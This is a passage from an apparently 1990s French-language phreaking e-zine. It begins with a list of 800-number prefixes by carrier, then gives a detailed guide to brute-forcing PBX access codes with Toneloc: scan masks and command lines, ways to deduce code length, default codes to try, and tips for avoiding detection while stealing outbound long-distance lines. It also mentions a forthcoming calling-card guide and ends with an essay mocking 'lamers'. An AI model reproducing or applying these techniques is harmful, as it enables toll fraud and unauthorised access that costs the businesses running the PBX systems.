825  MCI TELECOMMUNICATIONS CORPORATION
826  AT&T-C
827  US TELCOM, INC./US SPRINT
828  AT&T-C
829  US TELCOM, INC./US SPRINT
831  AT&T-C
832  AT&T-C
833  AT&T-C
834  800 NUMBER SERVICE & ASSIGNMENT CENTER
835  AT&T-C
836  MCI / TELECONNECT
837  MCI / TELECONNECT
838  UNITED/INT MN
839  STAR-LINE
841  AT&T-C
842  AT&T-C
843  AT&T-C
844  LDDS COMMUNICATIONS
845  AT&T-C
846  MCI TELECOMMUNICATIONS CORPORATION
847  AT&T-C
848  AT&T-C
849  BUSINESS TELECOM, INC.
850  TK COMMUNICATIONS
851  AT&T-C
852  AT&T-C
853  UNIVERSAL COMMUNICATIONS
854  AT&T-C
855  AT&T-C
857  MCI / TELECONNECT
858  AT&T-C
860  VIRTUAL NETWORK
862  AT&T-C
863  ALLNET COMMUNICATIONS SERVICES
864  TELESPHERE NETWORK
865  HAWAIIAN TELEPHONE
866  MCI TELECOMMUNICATIONS CORPORATION
867  VORTEL
868  MCI / TDD / SOUTHERNNET, INC.
869  US TELCOM, INC./US SPRINT
871  DIGITAL NETWORK, INC.
872  AT&T-C
873  MCI TELECOMMUNICATIONS CORPORATION
874  AT&T-C
875  ALLNET COMMUNICATIONS SERVICES
876  MCI TELECOMMUNICATIONS CORPORATION
877  US TELCOM, INC./US SPRINT
878  ALLNET COMMUNICATIONS SERVICES
879  MCI TELECOMMUNICATIONS CORPORATION
880  NATIONAL TELECOMMUNICATIONS
881  NATIONAL TELECOMMUNICATIONS
882  AT&T-C
883  CABLE & WIRELESS COMMUNICATIONS
884  US TELCOM, INC./US SPRINT
885  TELVUE,CORP
886  ALLNET COMMUNICATIONS SERVICES
887  EASTERN TELEPHONE SYSTEMS, INC.
888  MCI TELECOMMUNICATIONS CORPORATION
889  PACIFIC TELCOM
890  ATX-COMMUNICATIONS
891  TMC COMMUNICATIONS
892  AT&T-C
896  TEX-NET
898  COMMUNICATIONS GROUP OF JACKSON
899  CABLE & WIRELESS COMMUNICATIONS
902  RADIO COMMON CARRIER PAGING
908  AMERITECH AUDIOTEX SERVICES
912  RADIO COMMON CARRIER PAGING
922  AT&T-C
923  ALLNET COMMUNICATIONS SERVICES
924  800 NUMBER SERVICE & ASSIGNMENT CENTER
925  MCI TELECOMMUNICATIONS CORPORATION
926  MCI TELECOMMUNICATIONS CORPORATION
927  US TELCOM, INC./US SPRINT
928  AMERICALL SYSTEMS - LOUISIANNA
932  AT&T-C
933  MCI TELECOMMUNICATIONS CORPORATION
934  MCI TELECOMMUNICATIONS CORPORATION
936  R-COMM
937  MCI TELECOMMUNICATIONS CORPORATION
939  TELENATIONAL COMMUNICATIONS
940  ATC / SOUTH TEL
942  AT&T-C
943  AUS, INC.
944  MCI TELECOMMUNICATIONS CORPORATION
945  MCI TELECOMMUNICATIONS CORPORATION
946  PHONE ONE - AMERICAN PIONEER TELEPHONE
947  MCI TELECOMMUNICATIONS CORPORATION
948  PHOENIX NETWORK
950  MCI TELECOMMUNICATIONS CORPORATION
951  PHONE AMERICA
952  AT&T-C
955  MCI TELECOMMUNICATIONS CORPORATION
960  COMTEL OF NEW ORLEANS
962  AT&T-C
963  STATE OF CALIFORNIA
964  MCI TELECOMMUNICATIONS CORPORATION
965  TMC OF LEXINGTON
966  CABLE & WIRELESS COMMUNICATIONS
967  MCI TELECOMMUNICATIONS CORPORATION
968  TELEDIAL AMERICA
969  CABLE & WIRELESS COMMUNICATIONS
972  AT&T-C
980  VALU-LINE OF LONGVIEW, INC.
981  PUERTO RICO TELEPHONE
982  AT&T-C
983  WESTERN UNION TELEGRAPH CO.
986  WESTERN UNION TELEGRAPH CO.
987  BITTEL TELECOMMUNICATIONS CORPORATION
988  MCI / TELECONNECT
989  CABLE & WIRELESS COMMUNICATIONS
990  FEB CORPORATION
992  AT&T-C
993  ?
996  VALU-LINE
999  MCI TELECOMMUNICATIONS CORPORATION
------

Cette liste, en sachant que les pr�fix AT&T devraient �tre les seuls que
vous allez scanner, est un outil capital pour toute personne utilisant
Toneloc pour du scanning intensif...  Un dernier petit point � ce
propos... Plut�t que de perdre votre temps � chercher des PBX MCI ou
Sprint et � les hacker, trouvez-vous une carte d'appel et utilisez-la
donc DE VOTRE DOMICILE car, dans le fond, le risque de se faire prendre
est presqu'aussi grand! Si, � la rigueur, votre souci est de pouvoir
faire des appels gratuits � partir d'une cabine, vous verrez bient�t un
autre text-phile chez NPC, publi�e par moi-m�me et qui racontera comment
se procurer des num�ros de cartes d'appel d'une fa�on simple et rapide.




         ���������
         � Les rudiments du meilleur ami du Phreaker : TONELOC

    Vous vous �tes tous procur� le fameux et l�gendaire Toneloc. Je ne
comprends toutefois pas un petit d�tail : pourquoi autant de gens ont
tant de mal � l'utiliser? Ce n'est pourtant pas compliqu�, bordel! Et
c'est est sans parler de la maudite Bunch de lamers qui ont des
probl�mes de configuration et qui ne lisent m�me pas la Doc avant de me
demander, tel des idiots : " Comment je fais pour faire marcher Toneloc
?" Bordel! La doc est pourtant l� pour �a! Je peux comprendre les gens
qui ne la lisent pas lorsqu'ils l'utilisent sans probl�me, mais en cas
de probl�mes, utilisez la DOC putain de dieu!!!
    Enfin... Apr�s cette br�ve mont�e de lait, je dois toutefois y
ajouter un petit commentaire... Certaines personnes pleines de bonnes
volont� n'ont jamais et ne seront jamais capables d'installer Toneloc
pour diverses raisons INTELLIGENTES.  J'ai remarqu� quelques L�GERS bugs
que renferme ce merveilleux programme. Premi�rement, il y a les pauvres
utilisateurs de Com3 ou Com4. La configuration par d�faut pour les com3
et Com4 sur un U.S.Robotics (interne) est respectivement l'IRQ 5 et 7.
Ce cher Toneloc dig�re mal les changements d'IRQ. Si vous voulez
utiliser Toneloc sans probl�me avec un Interne, vous devrez changer
votre IRQ's Setting du modem sur l'IRQ 4 pour le Com3 et l'IRQ 3 pour le
Com4. (Et oui, le contraire du bon sens!) Pour les pauvres personnes qui
poss�dent une imprimante laser en s�rie et une souris dans les 2 coms
externe, comme moi, la souris et le modem doivent absolument �tre sur
des IRQ DIFF�RENTS, parce que les deux items font appel � l'IRQ. Pour ce
qui est de l'imprimante en s�rie, m�me si elle est reli�e � l'IRQ via le
port s�rie, elle ne se sert pas de l'IRQ de toute fa�on alors elle ne
devrait pas poser de conflit. Certaines personnes que je ne nommerai pas
� cause de leur nombre incalculable � Qu�bec, ont eu la tr�s mauvaise
id�e de s'acheter un modem BOCA...  Je ne parlerai pas plus de ces
modems de qualit� plut�t douteuse puisque je crois que la plupart des
personnes concern�es savent tr�s bien ce que j'en pense.  Je ne suis pas
encore � la veille de partir une des ces fameuses guerres HST AGAINST
V32BIS.  C'est plut�t que je trouve TR�S stupide de payer pour une merde
TOTALE!! Je me dis que le v32bis est surement une tr�s bonne sorte de
protocol, mais que la qualit� des Bocas et de certains autres du genre
laisse BEAUCOUP � d�sirer... Enfin... Passons aux rudiments de Toneloc
pour ceux qui ont un modem valable ou ceux dont l'intelligence est
suffisante.  Petite note : si votre modem ne donne aucun probl�me �
Toneloc et que m�me apr�s avoir lu la Doc vous ne comprenez toujours
pas, jetez ce journal aux ordures � la seconde! Le PhReaK demande un
minimum de quotient intellectuel...

    Nous ne verrons ici que la Command Line pour ex�cuter le programme,
ainsi que les principales fonctions... Je vais laisser tomber les
fonctions sp�ciales comme le ExMask et ce genre de commandes.
    Voici la commande de base :

TONELOC [nom de la]  /M[le MASK � ]   /C[le fichier configuration]
       [datafile ]     [composer]       [� utiliser]

Le nom de la Datafile est le fichier .DAT o� toneloc inscrira toutes les
informations correspondantes aux r�sultats de votre scan.

Le MASK sera compos� des les num�ros que vous voulez scanner.
Exemple : Disons que vous voulez scanner l'Exchange 321 dans les 800, et
bien il vous faudra taper : /M1800321xxxx o� les xxxx repr�sentent les
num�ros � composer au hasard.
         Disons que vous voulez scanner un code de 3 chiffres dans un
pbx 800. Si le num�ro du PBX est le 1-800-435-2323, et que le code prend
3 chiffres, alors vous devrez inscrire /M18004352323wXXX .

REMARQUE :     Le -=W=- sert � dire au modem d'attendre un dial tone
pour continuer. Autrement dit, il composera 18004352323, il attendra que
le pbx r�ponde avec le Dial Tone, et lorsque le modem d�tectera le Dial
Tone, il encha�nera en composant les XXX qui sont en fait trois chiffres
au hasard. (Nous verrons plus tard comment reconna�tre un code de trois
chiffres...

Le fichier de configuration � utiliser est le fameux .CFG pour lequel
tant de gens ont de la mis�re! La commande /C est optionnelle, mais
personnellement, je trouve tr�s utile et beaucoup plus rapide de se
cr�er plusieurs .CFG selon les endroits o� l'on d�sire scanner. Par
exemple, il peut �tre tr�s pratique d'utiliser un .CFG diff�rent pour
scanner les num�ros LOCAUX et les num�ros 800, surtout pour la raison
que le timeout par appel devra �tre plus long pour les 800 que pour les
LOCAUX et qu'�diter le m�me .CFG � chaque fois que l'on veut scanner
ailleurs peut �tre tr�s ennuyant, long et INUTILE... Personnellement
j'utilise six .CFG diff�rents...

EXEMPLE : Je veux scanner le pbx 1-800-435-3825 qui poss�de 4 chiffres
         de code. Vous d�sirez utiliser le fichier configuration
         CODE.CFG.  Donc, vous devrez entrer :

              Toneloc code3825 /M18004353825wXXXX /Ccode

Voil� en clair et simple... Pour les fonctions avanc�es, LISEZ LA DOC!!
Derni�re petite chose : pour faire des pauses de temps pendant le
dialing, utiliser la VIRGULE ','  Elle vaut 2 secondes d'attente par
d�faut, ce qui laisse sous-entendre que c'est configurable. La commande
de mon modem pour d�finir sa dur�e est ATS8=x en seconde.

-=REMARQUE=-  :  Ne JAMAIS utiliser un template de plus de 4 'X' dans
                une seule command line. Toneloc n'est pas con�u pour
                plus long que XXXX. Bien sur, rien ne vous emp�che de
                r�partir les X un peu partout...
                Pour un code de 5 chiffres, fa�tes-vous 10 command line
                et DataFile et fa�tes plut�t 0XXXX, 1XXXX, 2XXXX, etc.
                comme Mask...




         ���������
         � Le nombre de chiffres de code et la partie HACKING du PBX!!!

    Je dirais que c'est v�ritablement la partie la plus difficile et
celle qui demande le plus d'exp�rience...  En effet, � cause de la tr�s
grande vari�t� de mod�les de PBX, il devient souvent tr�s difficile
sinon totalement impossible de trouver de combien de chiffres est
compos� le code.  Nous verrons ici plusieurs exemples qui vous
permettront de comprendre comment trouver ce nombre si important.
Que se passe-t-il lorsque vous entrez le bon code? Le PBX r�pondra par
un autre tone que Toneloc d�tectera. Vous aurez donc d�tect� le ou les
bons codes! Voici maintenant certains types :

    1-   Il y a les �vidents. J'en ai vu plusieurs de ceux-l�, que
semblent particuli�rement adorer MCI ou SPRINT.  J'en ai par contre vu
aussi plusieurs de la sorte chez AT&T. Cette sorte de PBX est tout
simplement la plus facile � hacker. Pourquoi? Parce que vous n'avez qu'�
entrer un chiffre apr�s l'autre au hasard et � un certain moment, vous
entendrez un certain signal tr�s distinct. Disons que vous avez entr� 4,
3, 5, 6 et que soudain vous entendez un Fast-Busy (Signal ENGAG�
rapide), votre code est invalide. Par contre, puisque le syst�me vous
dit lui m�me ou presque que le code est incorrect apr�s quatre touches,
vous pouvez conclure facilement que le code est de quatres chiffres.
Certains syst�mes dont les op�rateurs sont plut�t stupides vous feront
entendre carr�ment un message enregistr� vous disant que le code est
incorrect... Ridicule...

    2-   Les fameuses sir�nes...  Je ne sais pas pourquoi, mais j'ai
constamment l'impression qu'elles sont l� uniquement pour nous
emb�ter... Les sir�nes dont nous parlons ici sont celles que vous
entendez lorsque vous venez de composer un code incorrect dans un pbx...
Je ne parle pas des sir�nes que vous pouvez rejoindre directement comme
les num�ros 800 ci-bas...  Elles ont une particularit� : votre modem la
d�tecte comme un tone!  Voil� qui est plut�t ridicule �tant donn� que la
diff�rence � vos oreilles est �norme. Si vous n'en avez jamais entendu
une, voici quelques num�ros : 1-800-521-0315, 1-800-521-8461 ou 1-800-
521-8470... Comment faire pour que votre modem la diff�rencie d'un tone
normal? Il n'y a aucun moyen... ;-)  Vous devrez plut�t chercher
ailleurs... Qu'arrive-t-il lorsque vous �mettez un Digit (son d'un des
chiffres du clavier Touch Tone) ?!?  La sir�ne continuera comme si elle
n'avait rien entendu et VOTRE MODEM LA D�TECTERA � NOUVEAU COMME UN
TONE... Que devez-vous faire en premier de votre domicile pour composer
un longue distance? Vous tapez le num�ro -=1=- du t�l�phone... Et
qu'arrive-t-il lorsque vous entrer le -=1=- ? Le dial tone se tait...
Maintenant allez configurer votre .CFG pour qu'il d�tecte ALL BUT TONES
(Tout sauf les tones). Voici la command line :

Toneloc code435 /M18004352898wXXXXw1 /Csiren

Commencez-vous � comprendre l'astuce? Si vous avez entr� un 1 en
entendant la sir�ne, la sir�ne continuera d'�mettre et votre modem
d�tectera � nouveau le tone, donc le code que vous aurez entr� en
premier sera un Faux.  Par contre, si vous avez entr� le BON code, le W
apr�s les XXXX d�tectera un VRAI tone, il composera 1 et comme chez
vous, le Dial Tone se taira et votre modem ne pourra pas d�tecter de
tone avec le dernier W... Donc votre modem d�tectera un Timeout!
(Calculez bien votre temps pour que si vous entrez le bon code, le
moment de silence � d�tecter ne d�passe pas 3-4 secondes...)  En fait
vous aurez scann� pour les Timeouts...

    3-   Les inconstants : Ceux l� sont assez bizarres... Le nombre de
chiffres possibles � entrer varie selon le premier chiffre que vous
entrez. Habituellement, scanner un tel syst�me ne m�ne � rien sauf dans
certain cas o�, en entrant 1 seul chiffre de code (normalement 9,8 ou
7), il vous redonne imm�diatement un dial tone. Dans ces cas vous avez
deux choix : vous pouvez suivre � partir de ce moment la m�thode 1 ou 2,
ou vous pouvez suivre la m�thode 4 ci-dessous...

    4-   Les NUM�ROS + CODE avec avertissement... Ceux-l� sont
normalement pour des codes qui semblent �tre de 13 � 17 chiffres. En
effet, on peut quelques fois croire qu'il sagit d'un code de 13 � 17
chiffres, mais o� il ne sagirait en fait que de composer son num�ro �
composer (Sans le 1 normalement) et d'encha�ner IMM�DIATEMENT avec le
code. Le PBX proc�dera automatiquement � la communication si vous
poss�dez le bon code sinon, vous obtiendrez le message d'erreur. Pour
d�tecter que vous avez atteint le num�ro que vous vouliez appeler,
fa�tes le composer un num�ro toujours engag�. De cette fa�on, si votre
modem d�tecte un busy, c'est que vous aurez compos� le bon code puisque
la communication aura �t� effectu�e... Command line :

Toneloc code435 /M18004353498w4186837183XXXX /Cnum&cod
                             ��������������
O� 418-683-7183 devrait       Le "suppos�"
�tre un num�ro TOUJOURS       code de 14
BUSY! (Engag�)                 chiffres...

    5-   Les infinis... Ah bon dieu ceux-l�! C'est ce que j'appelle en
langage courant : les Pas-Hackables!  Peu importe le nombre de chiffres
que vous entrerez, le silence se perp�tuera sans lasse, jusqu'� ce que
vous deveniez fous et que vous effaciez le num�ro...  J'en suis s�r, ils
ont �t� con�us pour �a!!!! ;-)  Il y a plusieurs solutions possibles...
Essayez, si vous avez du temps � perdre, de SUPPOSER que le nombre de
chiffre du code est de 3 ou 4... Plus que cela serait perdre son temps
pour un essai aussi peu assur� de rendement. Essayer la m�thode 1 et 4.


    Vous venez de voir les principales fa�on de HACKER un PBX... Il en
existe �videmment d'autres. Je ne parlerai que tr�s peu du r�le que joue
la touche di�se -=#=- dans un PBX... En effet, j'ai remarqu� que les PBX
qui l'utilisent sont souvent TR�S difficile � hacker. Voici un exemple
d'un syst�me commun utilisant la touche di�se :
    J'ai trouv� quelques fois un syst�me o� l'on pouvait composer
autant de chiffres que l'on d�sirait et qu'� n'importe quel moment, on
pouvait appuyer sur la touche di�se et obtenir un tone ou un Fast-
Busy... Dans le cas d'un tone, on peut supposer qu'il faut entrer son
code, appuyer sur # pour �muler un Enter, et ensuite composer le num�ro
avec ou sans 1 devant et esp�rer avoir le bon code. Dans le cas d'un
Fast-Busy, on peut supposer qu'il donnerait un tone si le bon code avait
�t� entr�...  Vous devinez la suite... (Je l'esp�re!!!)  Le # peut jouer
d'autres r�les mais je ne parlerai pas de ces quelques cas particuliers.
Il arrive aussi que la fonction # soit remplac�e par le *.

REMARQUE :     Il existe certains syst�mes, normalement caract�ris� par
la m�thode 3 et 5, qui seraient suppos�ment de v�ritable Bunker
d'information et de lignes de toutes sortes... Les capacit�s de ces PBX
sont pour la plupart inconnues, mais il s'agirait de PBX o� l'on peut
trouver des CARRIERS, des syst�mes de VMB (Voice Mail Box) et plusieurs
lignes t�l�phoniques. Ces syst�mes appel�s CBX seraient d'une
performance optimale et de possibilit�s seraient immenses. Un seul petit
probl�me : ils seraient para�t-il munis de syst�me ANI... Ooops! Vous
comprenez ce que je veux dire? Que les pbx de la m�thode 3 et 5 seraient
moins "safe"... Mais ceci n'est qu'un avertissement fond� sur un
ramassis de rumeurs plus ou moins fond�es et dont la v�racit� n'a jamais
�t� v�rifi�e...




          ���������
          � Apr�s la d�couverte du Code!

    Tout est presque gagn� maintenant...  Vous avez trouv� le principal
qui est le code et il ne vous reste plus qu'� acc�der � la ligne
t�l�phonique de sortie...  Rien de tr�s compliqu�!  Je suis s�r que, un
jour que vous �tiez dans un bureau quelque part, vous avez d�j� demand�
si vous pouviez t�l�phoner et on vous a r�pondu : �Appuyer sur le 9
avant de faire votre appel � C'est le m�me principe, car une fois que
vous avez entr� le bon code d'acc�s, vous vous retrouverez dans la m�me
position QUE TOUT AUTRE PERSONNE QUI PREND LE T�L�PHONE DANS LE BUREAU!!
Ce qui veut dire?  C'est que pour acc�der � la ligne t�l�phonique de
sortie, vous n'aurez qu'� taper le 9 comme si vous �tiez � l'int�rieur
du bureau en question...  Je dis que vous devez taper 9, mais cela n'est
qu'une g�n�ralit�. En effet, sur plusieurs syst�mes de PBX, le num�ro �
entrer apr�s avoir entr� le code sera un autre que 9... En g�n�ral, il
peut sagir du 9, du 8 ou du 7, mais si le syst�me persiste � ne pas
fonctionner apr�s cela, essayez les tous et �a devrait aller...  Une
fois tout entr� correctement, montez le dragon ail� de la communication
et chevauchez le � travers le d�dale sinueux des lignes t�l�phoniques
mondiales jusqu'� l'�puisement de toutes ses ressources d'�nergie...
C'est alors que vous devrez revenir au bercail et chercher un autre
dragon qui vous fera repartir vers l'aventure...




         ���������
         � Miscellaneous problems...

    Voici quelques trucs pour certains probl�mes que vous pourriez
retrouver avec certains syst�mes dont j'ai eu � faire ou dont j'ai
entendu parler :

    1-   Parfois, apr�s avoir compos� le code d'acc�s, vous n'aurez pas
� composer de chiffres comme le 9,8 ou 7 pour avoir acc�s � la ligne de
sortie, vous n'aurez dans ces rares cas qu'� composer directement le
num�ro LD (Long Distance)...
    2-   Lorsque vous avez entr� le bon code, le chiffre pour acc�der
� la ligne t�l�phonique, que vous commencez � composer 1-416-765-9823 et
que le PBX vous envoie un message d'erreur, essayez sans le 1 au
d�but... Il arrive souvent qu'il soit facultatif.
    3-   Disons que vous �tes tr�s chanceux et que vous rencontrez un
PBX ne poss�dant pas de code...  Selon mes contacts, la compagnie de
t�l�phone n'est normalement pas responsable des fraudes sur les syst�mes
de PBX qu'elle loue aux compagnies.  Leur position est que la compagnie
n'a qu'� se d�brouiller pour effectuer un contr�le r�gulier sur les
appels...  De plus, un syst�me qui n'a absolument aucune protection ne
devrait certes pas poss�der le statut de SYST�ME PRIV� puisque il ne
fait rien pour emp�cher les intrus, donc on pourrait le qualifier de
syst�me plublic, donc ouvert � tous... Mais cela n'est que mon
impression personnelle et je ne me suis pas inform� sur les clauses de
fraudes t�l�phoniques...  Voil� qui sera surement un sujet futur trait�
par moi-m�me dans un prochain num�ro de NPC!
    4-   J'ai scann� UNE SEULE FOIS dans l'exchange d'une petite
compagnie du genre de PUERTO RICO TELEPHONE...  J'ai retenu la le�on...
Ne perdez donc pas votre temps...  Sauf dans le cas extr�me o� un de vos
contacts vous aurait jur� qu'une de ces compagnies BS renfermerait un
bunch de PBX...  Mais m�me dans ce cas, la s�curit� de ces compagnies
n'a jamais �t� v�rifi�e alors... A VOS RISQUES!!!
    5-   Les phone-traps : Attention � ces... Anti-Fraudeurs! C'est
uniquement dangereux lorsque vous scannez pour des carriers, mais je
vous en fait prendre note...  Il �mettra un Fake-Carrier et fera en
sorte que votre modem s'y connecte. Il notera ensuite la date, l'heure
et le num�ro d'origine de l'appel et votre num�ro sera plac� sous
surveillance comme �tant un num�ro suspect... Si vous scannez pour les
tones, �a ne devrait poser aucun probl�me...
    6-   Avant de commencer � hacker un PBX, TOUJOURS essayer certains
codes comme 1234, 9876, 0123, 0987, 1111, 2222, 3333, etc... Enfin vous
voyez le genre de code...  Le trouver de cette fa�on pourrait vous
�viter une perte de temps �norme... Surtout si le PBX poss�de 5 chiffres
de code!
    7-   Ne perdez pas votre temps! Scanner toujours les PBX � 3 ou 4
chiffres de code, mais pas plus... Cinq chiffres de codes peut � la
rigueur faire l'affaire si vous remarquez que la qualit� de la ligne est
�lev�e... Dans le cas contraire laissez tomber...
    8-   TOUJOURS scanner en RANDOM et non en mode s�quentiel. 150 000
num�ros appel�s en mois et ce, tous un � la suite de l'autre est
�videmment suspect, et je suis s�r que c'est ce que vous ne d�sirez
pas...
    9-   Petite HYPOTH�SE : Probablement que les compagnies de
t�l�phone savent que les modems d�tectent les sir�nes. Donc, les
nombreux num�ros qui ne seront que des sir�nes directes comme les trois
num�ros que j'ai donn� plus haut mais que vous aurez d�tect� comme �tant
des tones sont peut-�tre en fait des alertes anti-fraudes pour la
compagnie de t�l�phone comme quoi il vaudrait mieux surveiller les
syst�mes de PBX de cet Exchange � cause d'un scanneur dans le r�seau. Ce
scanneur serait vous-m�me �videmment... Peut-�tre que ces fameuses
sir�nes notent tout simplement votre num�ro quelque part comme �tant
suspect, puisque vous aviez une chance sur 10000 de composer ces num�ros
et que vous avez gagn�... Bref, cela n'est pas d'une tr�s grande
importance � savoir, mais ce n'�tait qu'une simple hypoth�se pour tenter
de comprendre � quoi servent les sir�nes directes... Si quelqu'un a une
id�e intelligente et fond�e sur leur utilit�, svp me le faire savoir...




         ���������
         � Conclusion

    Je crois bien avoir r�pondu � toutes les questions possibles sur
les PBX ou presque...  Je tenterai de me concentrer plus en d�tail sur
les sch�mas techniques des PBX dans un prochain num�ro de NPC si une
demande �vidente s'en fait ressentir...  Je d�sire pr�ciser que je
pourrai �tre rejoint sur la plupart des bbs pirate de Qu�bec sous ce
m�me alias...  TOUTEFOIS, allez plut�t �crire vos commentaires au Medic
Bbs de la fa�on sp�cifi�e au d�but de ce journal...  Ce guide peut
facilement servir de bon d�part pour tout phreaker d�butant et je n'ai
pas peur de le dire, de r�f�rence pour un initi�...  Enfin... J'appr�cie
toujours les commentaires de tous genres et les �ventuels conseils s'ils
sont justifi�s et intelligents.

    J'aimerais remercier cordialement un certain usager des bbs
"pirates" de Qu�bec nomm� Psychedelic Madness, aka Qu�bec Man, qui m'a
fait r�aliser � quel point un guide sur les PBX �tait n�cessaire
lorsqu'il m'a fait part de l'�tendue de ses connaissances sur les PBX...
Humm... Hummm... En effet, ce dernier lamer croyait dur comme fer qu'un
PBX �tait un T�L�PHONE DU FUTUR!!! Et merde! C'est � esp�rer que je n'en
rencontrerai pas d'autre comme lui sur ma route... Je suppose qu'au
prochain message, il me dira que les codes de PBX, t�l�phones du futur,
sont con�us pour faire des appels sur la plus proche station martienne
du syst�me solaire...


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����

 Je lame, tu lames, il lame, nous lamons, vous �tes une gagne
de morons...

--------------------------------------------------------------

                     By Mental Floss For NPC.
                     ------------------------

    Lamer, un mot utilis� � toutes les sauces. C'est rendu
que la majorit� des morons out there se sert de ce mot, sans
savoir, ou en pensant savoir ce que �a veut vraiment dire. Y'a
aussi toute la gang de so called 'Anti-LamerZ', le "z"
majuscule est ben important, parce qu'ils pensent que �a fait
"plus meilleur". D'apr�s ce que j'ai pu comprendre, un
'Anti-LamerZ', comme ils pr�tendent �tre, est quelqu'un qui a
un suppos� statut plus �lev� dans leur hi�rarchie de minable.
En d'autres mots, un anti-lamer est le meilleur des pas bons.
Mais en fin de compte, selon eux, tout le monde est lamer et
eux autres sont anti-lamer, donc pas lamer du tout. Disons
qu'ici je n'ai pas eu le choix d'employer ce terme (LAMER)
pour que les personnes concern�es puissent comprendre ce que
je voulais dire, mais � mes yeux le mot 'lamer' n'a pas de
sens dans la phrase pr�c�dente: vous verrez plus loin la
d�finition de 'lamer'.

    Une petite pr�diction en passant: d'ici pas grand temps
une grande majorit� des morons vont d�couvrir le terme
'�LITE', m�me si ce terme est employ� depuis des lunes. A
partir de cet instant, on entendra les m�mes personnes qui
utilisaient le terme 'lamer' auparavant dire... 'je suis plus
�lite que toi', 'mon bbs est un bbs �lite' etc... Et encore
une fois cette pellet� de stupides ne sauront pas ce que veut
dire ce mot... Ce sera s�rement un sujet trait� lors d'un
futur NPC.

    Lamer...Un historique?
Pourquoi pas? Depuis au moins 4-5 ans, on emploie ce terme �
Qu�bec. Ce mot de 5 lettres, issu des belles ann�es du C64,
�tait, � ses d�buts, employ� dans son vrai sens. Lentement,
quelques morons fervents de ce mot l'ont mut� en 'LAME' et
� partir de ce moment, un lamer �tait devenu un 'lame'. Je
peux vraiment dire que c'est � partir de cet instant que la
d�cadence du terme 'lamer' commen�a. Peu � peu, on est venu �
s'en servir pour identifier n'importe quoi, un peu comme on se
sert du mot 'chose' ou 'patente'. Donc..."T'es lame, c'est
lame, mon chien est un lame". Dans certains cas cette gang de
morons, sans vraiment le savoir, utilisaient le mot 'lame' en
y faisant refl�ter la bonne d�finition (le terme 'lame' sera
d�fini plus tard). Comme je disais, pour un temps on se
servait du terme lame sans savoir ce que �a voulait dire, mais
en utilisant le bons sens du terme. Plus tard, au grand
bonheur de tous les morons, I-COMM ouvrit ses portes, et ce
f�t la retransformation de 'lame' en 'lamer'. Depuis ce temps
la majorit� des low-life se traitent de 'lamerZ' entre eux (le
z est bien important encore une fois).

    Des d�finitions?, ouvrez grand vos yeux, surtout
les personnes concern�es.

Lame
----
Nul, d'une nullit�.
En qu�b�cois: poche, crisse de pas bon.

Lamer
-----
NB: Ceci est la d�finition originale du terme, telle qu'utilis�e
   � l'�poque, mais de nos jours les morons se multiplient sans
   cesse dans la sc�ne. Donc, tout comme les tortues
   adolescentes, le sens des mots subit certaines mutations.

On dit 'Lamer' d'une personne qui rippe les codes d'un autre.

Pour ceux d'un niveau intellectuel inf�rieur: On traite de
'Lamer' une personne qui prend les instructions d'un programme
fait par un autre et qui dit ensuite que c'est elle qui l'a
programm�. A l'origine c'�tait dans des intros ou des d�mos
que les lamers rippaient.

Voici un exemple d'un RIP, tel que pratiqu� par celui qu'on
peut consid�rer comme un soit-disant LAMER....

Le plus frappant... Notre ami, J�r�me Gauthier (Lucyfer ou
John Myles si vous aimez mieux), avec son so-called AXE
(Atomix Software), � l'�poque de The Forbidden Productions.

-Lui ripper? Jamais, voyons... exemple... Pkzip 1.93Beta...

--------------------------------------------------------------
PKUNZIP (R)   FAST!   Extract Utility    Version 2.01   03-15-92
Brough to you by The Forbidden Productions. Ha!. PKUNZIP/h for help
Thanx Heavy for the Originals.

On this 23rd day of March 1992, Heavy Metal gave me the original v.2.01

of this package. Now around 5:50pm, i'm just telling you that WE ARE THE

BESTS and we'll keep it going on. The Forbidden Productions : Lucyfer
, <DynamiX> and The Jungle Boy. For the lastest, call the Pandeamonium,

The Lucyfer's Palace
Phone # Available by a MEMBER!
--------------------------------------------------------------

Ceci est simplement Pkzip 1.93 avec le texte chang� � l'aide
d'un sector editor comme PcTools. Pour prouver � quel point il est
facile de ripper un programme, nous avons inclus un loader ripp�,
NPC.EXE.

This is the living truth...
Les paroles s'envolent mais les �crits restent.

Un autre exemple... Il y a un certain temps, je suis tomb� sur
une copie de Hoover Force, ou quelque chose dans le genre.
Dans le .NFO, on pouvait y lire....Cracked By Bad
Preacher/ISD. Mais, en fin de compte, cette bande de morons
avait seulement remplac� le nom du cracker original par leur
nom... Tr�s ing�nieux n'est-ce pas... Ils ont pris le cr�dit
du crack: disons plut�t qu'ils ont ripp� le .NFO...donc...
encore une fois...
RIPPER=LAMER.

J'esp�re que ces exemples vous ont aid� � mieux comprendre le
sens du mot 'lamer' et qu'� l'avenir vous allez en faire bon
usage, pas comme le mot FUCK.


�pilogue...

A la limite (extr�me limite), 'lame' est presque semblable �
'lamer' parce qu'un ripper (lamer) est un pas bon, un nul
(lame). Donc il existe toujours un certain lien entre les
deux, mais pas au point d'abuser du mot 'lamer'.

Am I the only lame person on this planet?...
Nope...You're among the 90% of lame people...yep 90%.
-STATISTIQUE CANADA

Et oui, dans la sc�ne PC/AMIGA/C64 etc... il y a 90% de pas
bons et 10% de gens qui contribuent au bon fonctionnement et �
la survie de cette sc�ne.

Donc un lamer est nomm� ainsi quand il le faut, mais cela ne
veut pas dire qu'il faut appeler une patate une carotte.


YOU CAN PUT A BULLET IN MY HEAD, BUT YOU CAN'T KILL A FUCKING WORD
I'VE SAID.


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����



                   OU SONT PASS�S LES VRAIS REBELLES?

                     --=YAKOUL IS ALIVE AND WELL=--
                        (and we're glad for it!)

                                  par
                               Blitzkreig


    On vous parle d'un vieux de la vieille, l�! A l'�poque ou
j'ai rencontr� Yakoul, il en �tait d�j� � son troisi�me net alors
que je cherchais encore comment ins�rer une disquette dans mon
XT. S'il est moins actif depuis un an, mettez �� sur le dos des
femmes et du Bell...

Fiche signal�tique:

Age: 30 ans
